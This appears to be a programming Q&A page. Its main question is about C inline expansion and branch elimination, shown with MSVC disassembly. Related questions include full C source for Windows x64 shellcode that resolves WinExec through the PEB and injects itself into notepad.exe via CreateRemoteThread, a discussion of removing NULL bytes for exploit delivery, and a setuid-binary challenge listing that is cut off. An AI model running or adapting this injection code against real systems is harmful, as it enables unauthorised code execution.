Inline functions expansion with inner switch - c

Consider the scenario where you have a complex procedure that have a state machine and is tracked with a state that never changes during a call to kernel, as in code illustrated below.
static inline void kernel(int recursion, int mode){
if(!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch(mode){
default return;
case 1: mode1(recursion-1);
case 2: mode2(recursion-1);
}
}
void mode1(int recursion){
kernel(recursion,1)
}
void mode2(int recursion){
kernel(recursion,2)
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing a interpreter for a subset of spirv byte code. The inner branch is for finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switch on instruction OpCodes. Writing separate functions for each state will be even more difficult to maintain, since the kernel already takes up 1000+ loc, and moving up and down for the same traversal point and keeping them the same can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {
default: return;
case 1:
switch (mode) {
default: return;
case 1: mode1(code + 1, recursion - 1);
case 2: mode2(code + 1, recursion - 1);
}
case 2:
switch(mode) {
default: return;
case 1: mode2(code + 1, recursion - 1);
case 2: mode1(code + 1, recursion - 1);
}
}
}
void mode1(const uint32_t* code,int recursion)
{
kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
kernel(code, recursion, 2);
}
int main()
{
mode1(interp_code, 5);
return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Working with inline directive yields just the same code as nothing specified in INLINE in O2

Related

How to remove NULL bytes from C generated shellcode?

For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
void print_shellcode(unsigned char* shellcode, int length)
{
printf("unsigned char shellcode[%d] = \n", length);
int i;
for (i = 0; i < length; i++)
{
if (i % 16 == 0)
{
printf("\"");
}
if (shellcode[i] == 0x00)
{
printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
}
else
{
printf("\\x%02x", shellcode[i]);
}
if ((i + 1) % 16 == 0)
{
printf("\"\n");
}
}
printf("\";\n");
}
DWORD GetNotepadPID()
{
DWORD dwPID = 0;
DWORD dwSize = 0;
DWORD dwProcesses[1024], cbNeeded;
if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
{
for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
{
if (dwProcesses[i] != 0)
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
if (hProcess)
{
TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
{
_tcslwr(szProcessName);
if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
{
dwPID = dwProcesses[i];
break;
}
}
CloseHandle(hProcess);
}
}
}
}
return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?

Is there a command execution vulnerability in this C program?

So I am working on a challenge problem to find a vulnerability in a C program binary that allows a command to be executed by the program (using the effective UID in Linux).
I am really struggling to find how to do this with this particular program.
The disassembly of the function in question (main function):
**************************************************************
* *
* FUNCTION *
**************************************************************
int __cdecl main(int argc, char * * argv)
int EAX:4 <RETURN>
int Stack[0x4]:4 argc
char * * Stack[0x8]:4 argv XREF[2]: 000109b0(R),
000109dd(R)
undefined4 Stack[-0x8]:4 local_8 XREF[1]: 00010bcb(R)
int Stack[-0xc]:4 in XREF[5]: 000109f0(W),
000109f3(R),
00010ad4(R),
00010b27(R),
00010b59(R)
int Stack[-0x10]:4 fd XREF[6]: 00010a1f(W),
00010a22(R),
00010aa5(R),
00010ab2(R),
00010ac9(R),
00010b4e(R)
pid_t Stack[-0x14]:4 pid XREF[4]: 00010a6b(W),
00010a6e(R),
00010a8b(R),
00010b6a(R)
int[2] Stack[-0x1c]:8 pipefd XREF[3,3]: 00010a3f(*),
00010a95(R),
00010b42(R),
00010abd(R),
00010b0f(R),
00010b36(R)
char Stack[-0x1d]:1 c XREF[2]: 00010b14(*),
00010b23(*)
int Stack[-0x24]:4 status XREF[2]: 00010b66(*),
00010b75(R)
main XREF[5]: Entry Point(*),
_start:00010866(*), 00010d30,
00010da0(*), 00011f34(*)
0001097d 55 PUSH EBP
0001097e 89 e5 MOV EBP,ESP
00010980 53 PUSH EBX
00010981 83 ec 1c SUB ESP,0x1c
00010984 e8 87 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010989 89 c3 MOV EBX,EAX
0001098b e8 80 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010990 53 PUSH EBX
00010991 50 PUSH EAX
00010992 e8 9d 16 CALL <EXTERNAL>::setreuid int setreuid(__uid_t __ruid, __u
00 00
00010997 83 c4 08 ADD ESP,0x8
0001099a e8 75 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
0001099f 89 c3 MOV EBX,EAX
000109a1 e8 6e 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
000109a6 53 PUSH EBX
000109a7 50 PUSH EAX
000109a8 e8 9b 16 CALL <EXTERNAL>::setregid int setregid(__gid_t __rgid, __g
00 00
000109ad 83 c4 08 ADD ESP,0x8
000109b0 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109b3 83 c0 04 ADD EAX,0x4
000109b6 8b 00 MOV EAX,dword ptr [EAX]
000109b8 85 c0 TEST EAX,EAX
000109ba 75 21 JNZ LAB_000109dd
000109bc a1 98 1f MOV EAX,[stderr]
01 00
000109c1 50 PUSH EAX
000109c2 6a 22 PUSH 0x22
000109c4 6a 01 PUSH 0x1
000109c6 68 50 0c PUSH s_Please_specify_the_file_to_verif_00010c50 = "Please specify the file to ve
01 00
000109cb e8 50 16 CALL <EXTERNAL>::fwrite size_t fwrite(void * __ptr, size
00 00
000109d0 83 c4 10 ADD ESP,0x10
000109d3 b8 01 00 MOV EAX,0x1
00 00
000109d8 e9 ee 01 JMP LAB_00010bcb
00 00
LAB_000109dd XREF[1]: 000109ba(j)
000109dd 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109e0 83 c0 04 ADD EAX,0x4
000109e3 8b 00 MOV EAX,dword ptr [EAX]
000109e5 6a 00 PUSH 0x0
000109e7 50 PUSH EAX
000109e8 e8 43 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
000109ed 83 c4 08 ADD ESP,0x8
000109f0 89 45 f8 MOV dword ptr [EBP + in],EAX
000109f3 83 7d f8 00 CMP dword ptr [EBP + in],0x0
000109f7 79 17 JNS LAB_00010a10
000109f9 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
000109fe e8 19 16 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a03 83 c4 04 ADD ESP,0x4
00010a06 b8 02 00 MOV EAX,0x2
00 00
00010a0b e9 bb 01 JMP LAB_00010bcb
00 00
LAB_00010a10 XREF[1]: 000109f7(j)
00010a10 6a 02 PUSH 0x2
00010a12 68 78 0c PUSH s_/dev/null_00010c78 = "/dev/null"
01 00
00010a17 e8 14 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
00010a1c 83 c4 08 ADD ESP,0x8
00010a1f 89 45 f4 MOV dword ptr [EBP + fd],EAX
00010a22 83 7d f4 00 CMP dword ptr [EBP + fd],0x0
00010a26 79 17 JNS LAB_00010a3f
00010a28 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
00010a2d e8 ea 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a32 83 c4 04 ADD ESP,0x4
00010a35 b8 05 00 MOV EAX,0x5
00 00
00010a3a e9 8c 01 JMP LAB_00010bcb
00 00
LAB_00010a3f XREF[1]: 00010a26(j)
00010a3f 8d 45 e8 LEA EAX=>pipefd,[EBP + -0x18]
00010a42 50 PUSH EAX
00010a43 e8 f8 15 CALL <EXTERNAL>::pipe int pipe(int * __pipedes)
00 00
00010a48 83 c4 04 ADD ESP,0x4
00010a4b 85 c0 TEST EAX,EAX
00010a4d 79 17 JNS LAB_00010a66
00010a4f 68 82 0c PUSH DAT_00010c82 = 70h p
01 00
00010a54 e8 c3 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a59 83 c4 04 ADD ESP,0x4
00010a5c b8 03 00 MOV EAX,0x3
00 00
00010a61 e9 65 01 JMP LAB_00010bcb
00 00
LAB_00010a66 XREF[1]: 00010a4d(j)
00010a66 e8 d9 15 CALL <EXTERNAL>::fork __pid_t fork(void)
00 00
00010a6b 89 45 f0 MOV dword ptr [EBP + pid],EAX
00010a6e 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a72 79 17 JNS LAB_00010a8b
00010a74 68 87 0c PUSH DAT_00010c87 = 66h f
01 00
00010a79 e8 9e 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a7e 83 c4 04 ADD ESP,0x4
00010a81 b8 04 00 MOV EAX,0x4
00 00
00010a86 e9 40 01 JMP LAB_00010bcb
00 00
LAB_00010a8b XREF[1]: 00010a72(j)
00010a8b 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a8f 0f 85 8c JNZ LAB_00010b21
00 00 00
00010a95 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010a98 6a 00 PUSH 0x0
00010a9a 50 PUSH EAX
00010a9b e8 60 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aa0 83 c4 08 ADD ESP,0x8
00010aa3 6a 01 PUSH 0x1
00010aa5 ff 75 f4 PUSH dword ptr [EBP + fd]
00010aa8 e8 53 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aad 83 c4 08 ADD ESP,0x8
00010ab0 6a 02 PUSH 0x2
00010ab2 ff 75 f4 PUSH dword ptr [EBP + fd]
00010ab5 e8 46 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aba 83 c4 08 ADD ESP,0x8
00010abd 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010ac0 50 PUSH EAX
00010ac1 e8 8a 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ac6 83 c4 04 ADD ESP,0x4
00010ac9 ff 75 f4 PUSH dword ptr [EBP + fd]
00010acc e8 7f 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ad1 83 c4 04 ADD ESP,0x4
00010ad4 ff 75 f8 PUSH dword ptr [EBP + in]
00010ad7 e8 74 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010adc 83 c4 04 ADD ESP,0x4
00010adf 6a 00 PUSH 0x0
00010ae1 68 8c 0c PUSH s_-asxml_00010c8c = "-asxml"
01 00
